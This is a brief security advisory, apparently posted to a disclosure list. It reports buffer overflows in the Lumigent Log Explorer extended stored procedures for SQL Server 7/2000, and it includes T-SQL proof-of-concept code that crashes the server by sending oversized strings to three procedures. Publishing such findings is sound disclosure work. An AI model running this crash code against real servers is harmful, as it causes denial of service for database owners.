Lumigent Log Explorer is a transaction log explorer for Microsoft SQL
Server 7/2000. It ships with extended stored procedures implemented in
xp_logattach.dll. Some of them suffer from buffer overflows that lead to
SQL Server service crash and potentially to arbitrary code execution.
Below is sample code that crashes SQL Server:
declare @bo varchar(8000)
set @bo = replicate('A', 800)
exec xp_logattach_StartProf @bo
declare @bo varchar(8000)
set @bo = replicate('A',800)
exec xp_logattach_setport @bo
declare @bo varchar(8000)
set @bo = replicate('A',800)
exec xp_logattach @bo
Procedures can be run only by dbo (master) by default. Vendor was informed
but I got no response confirming this problem and no fixes.
Cheers
Martin Rakhmanoff (jimmers)
jimmers@yandex.ru
